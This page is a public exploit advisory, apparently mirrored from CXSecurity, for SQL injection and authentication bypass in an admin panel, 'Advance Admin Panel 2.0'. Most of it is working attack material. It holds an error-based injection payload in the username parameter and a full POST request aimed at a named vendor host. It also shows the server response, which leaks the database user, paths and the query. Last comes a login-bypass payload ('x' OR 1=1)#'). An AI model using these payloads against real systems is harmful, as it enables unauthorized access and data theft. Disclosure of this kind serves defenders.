Firebase Push Notification iOS / FCM + Advance Admin Panel 2.0 SQL injection / Authentication bypass - CXSecurity.com

QQ空间 新浪微博 微信 QQ facebook twitter
漏洞ID 1215617 漏洞类型
发布时间 2018-07-08 更新时间 2018-07-08
CVE编号 N/A CNNVD-ID N/A
漏洞平台 N/A CVSS评分 N/A
|漏洞来源
https://cxsecurity.com/issue/WLB-2018070096
|漏洞详情
漏洞细节尚未披露
|漏洞EXP
# Exploit Title:  Firebase Push Notification iOS / FCM + Advance Admin Panel 2.0 - 'username' SQL injection / Authentication bypass 
# Date: 2018-07-08
# Exploit Author: L0RD
# Email: borna.nematzadeh123@gmail.com
# Vendor Homepage: https://codecanyon.net/item/firebase-push-notification-ios-fcm-advance-admin-panel/18600448?s_rank=19
# Version: 2.0
# Tested on: Win 10
=================================================
# POC : 

# vulnerable parameter : username 
# payload : 1') AND extractvalue(1,concat(0x3a,user(),0x3a))#

# Request : 
==============
POST /advance_push/public/login HTTP/1.1
Host: www.icanstudioz.com
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:62.0) Gecko/20100101 Firefox/62.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate
Content-Type: application/x-www-form-urlencoded
Content-Length: 117
Connection: keep-alive
Upgrade-Insecure-Requests: 1

_token=ITG4QVFxob9066DAIbRm7pZ5UrFZAbN9eEQOyaVU&username=1') AND extractvalue(1,concat(0x3a,user(),0x3a))#&password=1

# Response : 
===============
HTTP/1.1 500 Internal Server Error
Date: Fri, 06 Jul 2018 15:28:25 GMT
Server: Apache
Cache-Control: no-cache, private
Connection: close
Content-Type: text/html; charset=UTF-8
Content-Length: 46984

title="Illuminate\Database\QueryException">QueryException</abbr> in <a title="/home/icanstud/public_html/advance_push/vendor/laravel/framework/src/Illuminate/Database/Connection.php line 651" ondblclick="var f=this.innerHTML;this.innerHTML=this.title;this.title=f;">Connection.php line 651</a>:</span>
<span class="exception_message">
SQLSTATE[HY000]: General error: 1105 XPATH syntax error: ':icanstud_icanstu@localhost:' (SQL: select * from admin where (username =  '1') AND extractvalue(1,concat(0x3a,user(),0x3a))#' OR email = '1') AND extractvalue(1,concat(0x3a,user(),0x3a))#') and password = md5('1'))

=============================================
2) Authentication bypass : 

# Query : ('select * from admin where (username = '' OR email = '') and password = md5(''))
# Payload : x' OR 1=1)#

# Username : x' OR 1=1)#
# Password : anything 
=============================================